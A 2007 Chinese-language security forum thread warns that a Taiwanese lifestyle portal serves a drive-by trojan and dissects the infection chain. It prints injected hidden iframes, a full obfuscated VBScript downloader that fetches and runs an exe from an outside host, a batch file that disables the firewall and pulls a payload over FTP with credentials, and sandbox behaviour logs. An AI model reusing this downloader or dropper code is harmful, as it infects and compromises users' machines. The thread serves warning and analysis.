【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

[DarkSkyline]

FYI:
hxxp://www.honeypaper.com.tw/html/index.html

"AntiVir PersonalEdition Classic" 發現 [HEUR/Exploit.HTML]惡意網頁與[TR/Lineage.73216.2]木馬程式

PS:請各位網友小心,沒事請勿連結到此網站,以免中獎~

[Roger]

網頁code

Url = "http://www.honeypaper.com.tw";
</script><iframe src="http://www.avvcc.com/index.htm" width="100" height="0" frameborder="0"></iframe>
<script src="http://www.honeypaper.com.tw/include/js/ajax.js" type="text/javascript" language="javascript"></script>
<script src="http://www.honeypaper.com.tw/include/js/common.js" type="text/javascript" language="javascript"></script>
<base target="_blank" />

上面紅色的連結！

<iframe src=6143.htm width=0 height=0 frameborder=0></iframe>
<iframe src="fymianshaani.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="vip.htm" width="100" height="0" frameborder="0"></iframe>

等會兒再測

[Roger]

hxxp://www.avvcc.com/6143.htm

<html>
<script language="VBScript">
on error resume next
maface="Mic"&"ro"&"so"&"ft.X"&"M"&"LHT"&"TP"
tttatat="S"&"cr"&"ip"&"tin"&"g."&"Fi"&"le"&"Sy"&"st"&"em"&"Ob"&"j"&"e"&"ct"
kav="o"&"bje"&"ct"
ufoad123="A"&"do"&"db"&".St"&"rea"&"m"
Set df = document.createElement(kav)
regedit="c"&"ls"&"id:BD"&"9"&"6C5"&"56-6"&"5A3"&"-1"&"1D"&"0-"&"98"&"3"&"A-0"&"0"&"C04F"&"C2"&"9E36"
diter="c"&"l"&"a"&"s"&"s"&"i"&"d"
df.setAttribute diter, regedit
Set x = df.CreateObject(maface,"")
set SS = df.createobject(ufoad123,"")
SS.type = 1
x.Open "GET", "http://www.avvcc.com/20070418a.exe ", False
x.Send
marco1="svchost.exe"
set F = df.createobject(tttatat,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
qwe324a="S"&"he"&"l"&"l."&"Appl"&"i"&"ca"&"ti"&"on"
set Q = df.createobject(qwe324a,"")
asdwr="op"&"e"&"n"
Q.ShellExecute marco1,"","",asdwr,0
</script>
</html>

[Roger]

我只抓到這隻

[Roger]

tt.bat的結構

net stop sharedaccess
echo open 222.191.251.99>>1.txt
echo czh808>>1.txt
echo haha123520>>1.txt
echo get 0627xh.exe>>1.txt
echo bye>>1.txt
ftp -s:1.txt&del 1.txt
set dAte=%dAte%
dAte 1980-01-01
@echo off & setlocAl enAbleextensions
echo WScript.Sleep 110 > %system%.\run$.vbs
set /A i = 10
:Timeout
if %i% == 0 goto Next
setlocAl
set /A i = %i% - 1
cscript //nologo %system%.\ run$.vbs
goto Timeout
goto End
:Next
@0627xh.exe /uninstAll /silence
del 0627xh.exe
del tt.bat
del soft.vbs

[Roger]

soft.vbs的結構

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c tt.bat",vbhide

[Roger]

再下去，我就不會解了

那個0627xh.exe，到底載點在哪裡呢

[Roger]

有人解出來了！

ftp://222.191.251.99/0627xh.exe
username:czh808
password:haha123520

ftp://222.191.251.99/gztest.exe
username:czh808
password:haha123520

[Roger]

運行0627xh.exe，發現下列行為，被EQ-Secure RC3攔截！

2007-07-03 09:26:12 運行應用程序 操作:允許
進程路徑:C:\windows\Explorer.EXE
文件路徑:D:\桌面\virus\0627xh\0627xh.exe
規則:應用程序規則->系統程序->%windir%\Explorer.EXE

2007-07-03 09:27:24 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\0627xh.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:27:24 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\0627xh.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:27:24 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\0627xh.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:27:24 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\0627xh.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:27:24 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\0627xh.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:27:24 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\0627xh.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images\drcerwq.exe
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:27:24 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\0627xh.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images\drcerwq.dll
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:27:24 創建注冊表值 操作:阻止
進程路徑:D:\桌面\virus\0627xh\0627xh.exe
注冊表路徑:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
注冊表名稱:{7B8B0E17-B03E-4EDE-BA46-F31692D977BB}
規則:所有程序規則->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*


2007-07-03 09:27:24 創建注冊表值 操作:阻止
進程路徑:D:\桌面\virus\0627xh\0627xh.exe
注冊表路徑:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
注冊表名稱:{7B8B0E17-B03E-4EDE-BA46-F31692D977BB}
規則:所有程序規則->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*

1.他會在C：\windows\Web\printers\images\生成
drcerwq.exe
drcerwq.dll
2.他會創建注冊表值
HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
{7B8B0E17-B03E-4EDE-BA46-F31692D977BB}

[Roger]

運行drcerwq.exe，發現下列行為，被EQ-Secure RC3攔截！

2007-07-03 09:45:05 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:45:05 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:45:05 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:45:05 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:45:05 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:45:05 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images\drcerwq.exe
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:45:05 創建文件 操作:允許
進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images\drcerwq.dll
規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-03 09:45:06 創建注冊表值 操作:阻止
進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
注冊表路徑:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
注冊表名稱:{7B8B0E17-B03E-4EDE-BA46-F31692D977BB}
規則:所有程序規則->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*


2007-07-03 09:45:06 創建注冊表值 操作:阻止
進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
注冊表路徑:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
注冊表名稱:{7B8B0E17-B03E-4EDE-BA46-F31692D977BB}
規則:所有程序規則->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*

1.他會在C：\windows\Web\printers\images\生成
drcerwq.exe
drcerwq.dll
2.他會創建注冊表值
HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
{7B8B0E17-B03E-4EDE-BA46-F31692D977BB}